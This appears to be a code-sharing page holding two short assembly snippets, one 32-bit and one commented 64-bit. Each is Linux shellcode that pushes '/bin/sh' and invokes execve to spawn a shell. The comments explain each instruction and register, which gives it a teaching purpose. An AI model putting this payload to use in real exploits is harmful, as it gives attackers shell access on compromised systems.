This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mov eax, 0x0068732f | |
push eax | |
mov eax, 0x6e69622f | |
push eax | |
mov eax, 0x0b | |
mov ebx, esp | |
xor ecx, ecx | |
xor edx, edx | |
int 0x80 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mov rax, 0x0068732f6e69622f ; "/bin/sh" in ascii (including a null terminator), | |
; since we are on little endian the integer bytes are flipped so when loaded to memory | |
; it will load correct | |
push rax ; pushing to memory so it will accessible by pointer | |
mov rax, 0x3b ; execve syscall id | |
mov rdi, rsp ; first parameter a pointer to the program to execute - pointer to the newly pushed string | |
xor rsi, rsi ; the second parameter a pointer to the argv of the program - NULL | |
xor rdx, rdx ; the third parameter a pointer to the env variables of the program - NULL | |
syscall ; shell! |